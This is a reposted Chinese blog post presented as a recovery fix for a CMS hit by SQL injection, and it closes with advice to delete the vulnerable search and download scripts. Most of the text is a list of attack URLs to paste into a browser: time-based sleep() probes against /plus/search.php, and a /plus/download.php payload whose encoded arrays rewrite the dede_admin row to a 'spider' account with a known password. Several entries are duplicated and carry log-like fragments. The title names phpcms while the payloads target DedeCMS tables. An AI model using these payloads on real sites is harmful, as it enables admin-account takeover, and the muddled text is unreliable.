phpcms 别其他人注入sql , 后台提示用户名不存在解决方法

如果已经发现/data,有很长一个txt记事本,说明已经被其他人SQL注入了,或是已经有人进行尝试SQL注入了了。

记事儿本如:75252sdaswfdfsfq538ef2ad3556_safe.txt这样的。

    1. 把以下代码一个个的复制到地址栏中并确定第一行算是一次确定网址/plus/search.php?kwtype=0&searchtype=titlekeyword&
      keyword=135791+and+sleep%280%29||SELECT spwords FROM
      `dede_search_keywords` WHERE keyword='135791 and sleep(0)' LIMIT
      0,1;||SelectBreak

    2. 网址/plus/search.php?kwtype=0&searchtype=titlekeyword&
      keyword=135791+and+sleep%285-5%29||SELECT spwords FROM
      `dede_search_keywords` WHERE keyword='135791 and sleep(5-5)' LIMIT
      0,1;||SelectBreak

    3. 网址/plus/search.php?kwtype=0&searchtype=titlekeyword&
      keyword=135791+and+sleep%285%29||SELECT spwords FROM
      `dede_search_keywords` WHERE keyword='135791 and sleep(5)' LIMIT
      0,1;||SelectBreak

    4. 网址/plus/search.php?kwtype=0&searchtype=titlekeyword&
      keyword=135791%27+and+sleep%280%29%23||SELECT spwords FROM
      `dede_search_keywords` WHERE keyword='135791 and sleep(0)#' LIMIT
      0,1;||SelectBreak

    5. 网址/plus/search.php?kwtype=0&searchtype=titlekeyword&
      keyword=135791%27+and+sleep%285-5%29%23||SELECT spwords FROM
      `dede_search_keywords` WHERE keyword='135791 and sleep(5-5)#' LIMIT
      0,1;||SelectBreak

    6. 网址/plus/search.php?kwtype=0&searchtype=titlekeyword&
      keyword=135791%27+and+sleep%285%29%23||SELECT spwords FROM
      `dede_search_keywords` WHERE keyword='135791 and sleep(5)#' LIMIT
      0,1;||SelectBreak

    7. 网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&
      arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35||
      INSERT INTO `dede_admin` SET `userid`='spider',
      `pwd`='f297a57a5a743894a0e4' where id=1
      #downloads`(`hash`,`id`,`downloads`)
      VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect

    8. 网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&
      arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35||
      INSERT INTO `dede_admin` SET `userid`='spider',
      `pwd`='f297a57a5a743894a0e4' where id=1
      #downloads`(`hash`,`id`,`downloads`)
      VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect

    9. 网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&
      arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35||
      INSERT INTO `dede_admin` SET `userid`='spider',
      `pwd`='f297a57a5a743894a0e4' where id=1
      #downloads`(`hash`,`id`,`downloads`)
      VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect

    10. 网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&
      arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35||
      INSERT INTO `dede_admin` SET `userid`='spider',
      `pwd`='f297a57a5a743894a0e4' where id=1
      #downloads`(`hash`,`id`,`downloads`)
      VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect

    11. 网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&
      arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35||
      INSERT INTO `dede_admin` SET `userid`='spider',
      `pwd`='f297a57a5a743894a0e4' where id=1
      #downloads`(`hash`,`id`,`downloads`)
      VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect

    12. 网址/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&
      arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35||
      INSERT INTO `dede_admin` SET `userid`='spider',
      `pwd`='f297a57a5a743894a0e4' where id=1
      #downloads`(`hash`,`id`,`downloads`)
      VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect

    13. 网址//plus/search.php?kwtype=0&searchtype=titlekeyword&
      keyword=135791+and+sleep%280%29||SELECT%20spwords%20FROM%20`dede_search_keywords`%20WHERE%20keyword='135791%20and%20sleep(0)'%20LIMIT%200,1;||SelectBreak||SELECT
      spwords FROM `dede_search_keywords` WHERE keyword='135791 and
      sleep(0)||SELECT spw' LIMIT 0,1;||SelectBreak

    14. 完成之后,就可以直接在后台使用spider这个用户名。用admin这个密码登录了我们网站也是刚被攻击的,官方给的补丁是无效的。我个人是直接把plus目录下的下载文件及搜索php文件是直接删除就解决了。因为很多程序都是通过搜索SQL注入了,本网站使用的是百度搜索,不需要自己的功能功能。

猜你喜欢

转载自www.cnblogs.com/xaun/p/11791780.html